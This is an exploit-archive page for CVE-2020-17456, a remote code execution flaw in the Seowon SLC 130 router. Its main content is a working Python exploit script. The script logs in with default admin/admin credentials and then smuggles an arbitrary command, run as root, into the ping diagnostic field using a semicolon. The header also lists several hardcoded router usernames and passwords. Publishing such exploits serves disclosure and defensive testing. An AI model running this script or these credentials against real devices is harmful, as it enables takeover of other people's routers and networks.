Seowon SlC 130 Router Remote Code Execution

Seowon SlC 130 Router Remote Code Execution: Posted Aug 21, 2020; Authored by Ali Jalalat; Seowon SlC 130 Router suffers from a remote code execution vulnerability.; tags | exploit, remote, code execution; advisories | CVE-2020-17456; SHA-256 | 2c2caed94290b76cf2dcb160e2fa1928c1b317ff58fa6be49af50b2e9dfe1014; Download | Favorite | View

Seowon SlC 130 Router Remote Code Execution

# Exploit Title: Seowon SlC 130 Router - Remote Code Execution
# Author: maj0rmil4d - Ali Jalalat
# Author website: https://secureguy.ir
# Date: 2020-08-20
# Vendor Homepage: seowonintech.co.kr
# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kind=B05&middle_kind=B05_29
# CVE: CVE-2020-17456
# Version: Lync:Mac firmware 1.0.1, likely earlier versions
# Tested on: Windows 10 - Parrot sec

# Description:
# user can run arbitrary commands on the router as root ! 
# as there are already some hardcoded credentials so there is an easy to trigger exploit

# credentials : 
# user => VIP
# pwd => V!P83869000

# user => Root
# pwd => PWDd0N~WH*4G#DN

# user => root
# pwd => gksrmf28

# user => admin
# pwd => admin
# 

# A  write-up can be found at:
# https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/

import requests
import sys

host = sys.argv[1]

session = requests.Session()

header = { 

"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q:0.9,image/webp,*/*;q:0.8",
"Accept-Language": "en-US,en;q:0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "pplication/x-www-form-urlencoded",
"Content-Length": "132",
"Origin": "http://192.168.1.1",
"Connection": "close",
"Referer": "http://192.168.1.1/",
"Upgrade-Insecure-Requests": "1"
}



datas = {
  
  "Command":"Submit",
  "expires":"Wed%2C+12+Aug+2020+15%3A20%3A05+GMT",
  "browserTime":"081119502020",
  "currentTime":"1597159205",
  "user":"admin",
  "password":"admin"
}


#auth

session.post(host+"/cgi-bin/login.cgi" , headers=header , data = datas)

#rce

cmd = sys.argv[2]

rce_data = {
  
  "Command":"Diagnostic",
  "traceMode":"ping",
  "reportIpOnly":"",
  "pingIpAddr":";".encode("ISO-8859-1").decode()+cmd,
  "pingPktSize":"56",
  "pingTimeout":"30",
  "pingCount":"4",
  "maxTTLCnt":"30",
  "queriesCnt":"3",
  "reportIpOnlyCheckbox":"on",
  "btnApply":"Apply",
  "T":"1597160664082"
}

rce = session.post(host+"/cgi-bin/system_log.cgi" , headers=header , data = rce_data)

print("one line out put of ur command => " + rce.text.split('!')[1].split('[')[2].split("\n")[0])

Top Authors In Last 30 Days

Red Hat 236 files
Ubuntu 90 files
Gentoo 31 files
Debian 23 files
tmrswrr 10 files
Sina Kheirkhah 7 files
Amit Roy 4 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,077)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,339)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,263)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,651)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

Seowon SlC 130 Router Remote Code Execution

Seowon SlC 130 Router Remote Code Execution

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Seowon SlC 130 Router Remote Code Execution

Share This

Seowon SlC 130 Router Remote Code Execution

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems